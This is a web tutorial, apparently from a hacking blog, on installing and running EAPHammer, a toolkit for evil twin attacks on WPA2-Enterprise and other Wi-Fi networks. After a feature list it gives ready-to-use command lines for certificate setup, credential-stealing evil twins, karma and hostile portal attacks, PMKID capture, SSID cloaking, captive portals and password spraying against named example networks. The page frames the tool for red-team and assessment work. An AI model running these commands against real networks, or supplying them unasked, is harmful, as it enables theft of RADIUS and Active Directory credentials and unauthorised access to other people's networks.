How to Install EAPHammer
Posted in: Tools, Wi-Fi Hacking

EAPHammer: Attack WPA2-Enterprise networks

A toolset called EAPHammer can be used to launch focused evil twin attacks against WPA2-Enterprise networks. It is intended for usage in red team engagements and full scope wireless assessment.

As a result, emphasis is put on offering a simple interface that can be used to execute effective wireless assaults with little user configuration.


  • Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process
  • Leverages latest version of hostapd (2.8)
  • Support for evil twin and karma attacks
  • Generate timed Powershell payloads for indirect wireless pivots
  • Integrated HTTP server for Hostile Portal attacks
  • Support for SSID cloaking
  • Fast and automated PMKID attacks against PSK networks using hcxtools
  • Password spraying across multiple usernames against a single ESSID

Download Full Guide

Our Quick Start section gives an example of how to carry out a credential theft evil twin attack against a WPA/2-EAP network using only commands to show how quick this tool is.

How to Install EAPHammer

git clone

Generate EAPHammer Certificates

./eaphammer --cert-wizard
./eaphammer -i wlan0 --channel 5 --auth wpa-eap --essid OffWifi --creds

Karma attacks

./eaphammer -i wlan0 --essid offwifi --cloaking full -c 7 --auth open --hostile-portal --karma

PMKID Attacks

./eaphammer --pmkid --interface wlan0 --bssid fc:ad:83:77:fe:ab --channel 10

ESSID Cloaking

./eaphammer -i wlan0 -e CompanyXYZ -c 1 --auth open --hostile-portal --cloaking full

Captive Portal Attacks

./eaphammer --bssid fc:ad:83:77:fe:ab --essid CompanyXYZ --channel 149 --interface wlan0 --captive-portal

Password Spraying

./eaphammer --eap-spray --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 --essid CompanyXYZ --password qwerty1234 --user-list users.txt


Leave a Reply

Back to Top